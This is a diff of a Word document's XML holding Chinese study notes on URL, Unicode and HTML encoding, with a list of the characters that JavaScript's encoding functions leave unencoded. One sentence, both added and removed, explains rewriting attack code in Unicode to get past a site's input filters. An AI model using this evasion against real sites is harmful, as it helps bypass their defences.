+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>URL编码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Url中只允许包含英文字母</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">【 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>a-zA-Z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 】</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>、数字</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">【 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>0-9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 】</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">【 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>-_.~</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 】</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>4个特殊字符以及所有保留字符</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">【  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">! * ' ( ) ; : @ &amp; = + $ , / ? # [ ] </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 】,所以其他字符需要URL编码。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>保留字符:冒号用于分隔协议和主机，/用于分隔主机和路径，?用于分隔路径和查询参数，等等。还有一些字符（!$&amp;'()*+,;=）用于在每个组件中起到分隔作用的，如=用于表示查询参数中的键值对，&amp;符号用于分隔查询多个键值对。当组件中的普通数据包含这些特殊字符时，需要对其进行编码。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>URL编码</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>对于ASCII字符，采用%+ASCII（16进制），对于非ASCII字符，采用%+UTF8(16进制)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>　JavaScript中提供了3对函数用来对Url编码以得到合法的Url，它们分别是escape / unescape, encodeURI / decodeURI和encodeURIComponent / decodeURIComponent。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>下面列出了这三个函数的安全字符（即函数不会对这些字符进行编码）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>escape（69个）：*/@+-._0-9a-zA-Z</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>encodeURI（82个）：!#$&amp;'()*+,/:;=?@-._~0-9a-zA-Z</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>encodeURIComponent（71个）：!'()*-._~0-9a-zA-Z</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t> unicode编码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Unicode有1114112个码位，也就是说可以分配1114112个字符。Unicode编码的字符以%u为前缀，后面是这个字符的十六进制unicode的码点。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>如%u+utf8(16进制)。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Unicode编码之所以被本文提到，因为有的站点过滤了某些字符串的话，但是发现这个站点在后端验证字符串的时候，识别unicode编码，那我们就可以把我</w:t>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
@@ -4266,381 +5818,147 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>们的攻击代码来改成unicode编码形式，就可以绕过站点的过滤机制了。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>常见的编码方法</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>HTML编码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="5268595" cy="3668395"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="8255"/>
+            <wp:docPr id="1" name="图片 1" descr="4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name="图片 1" descr="4"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5268595" cy="3668395"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>）</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>URL编码</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>URL只允许用US-ASCII字符集中可打印的字符(0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>x</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>20—0x7x)，其中某些字符在HTTP协议里有特殊的意义，所以有些也不能使用。这里有个需要注意的，+加号代表URL编码的空格，%20也是。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>URL编码最长见的是在用GET/POST传输时，顺序是把字符改成%+ASCII两位十六进制(先把字符串转成ASCII编码，然后再转成十六进制)。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>）</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t> unicode编码</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>Unicode有1114112个码位，也就是说可以分配1114112个字符。Unicode编码的字符以%u为前缀，后面是这个字符的十六进制unicode的码点。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>Unicode编码之所以被本文提到，因为有的站点过滤了某些字符串的话，但是发现这个站点在后端验证字符串的时候，识别unicode编码，那我们就可以把我们的攻击代码来改成unicode编码形式，就可以绕过站点的过滤机制了。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>）</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>HTML编码</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>HTML编码的存在就是让他在代码中和显示中分开， 避免错误。他的命名实体：构造是&amp;加上希腊字母，字符编码：构造是&amp;#加十进制、十六进制ASCII码或unicode字符编码，而且浏览器解析的时候会先把html编码解析再进行渲染。但是有个前提就是必须要在“值”里，比如属性src里，但却不能对src进行html编码。不然浏览器无法正常的渲染。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>例如：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>&lt;img src=&amp;#108;&amp;#111;&amp;#103;&amp;#111;&amp;#46;&amp;#112;&amp;#110;&amp;#103;/&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>可以正常显示。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>但是当你把src或者img进行html编码就不行了，例如：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>&lt;img &amp;#115;&amp;#114;&amp;#99;=&amp;#108;&amp;#111;&amp;#103;&amp;#111;&amp;#46;&amp;#112;&amp;#110;&amp;#103;/&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
     </w:p>
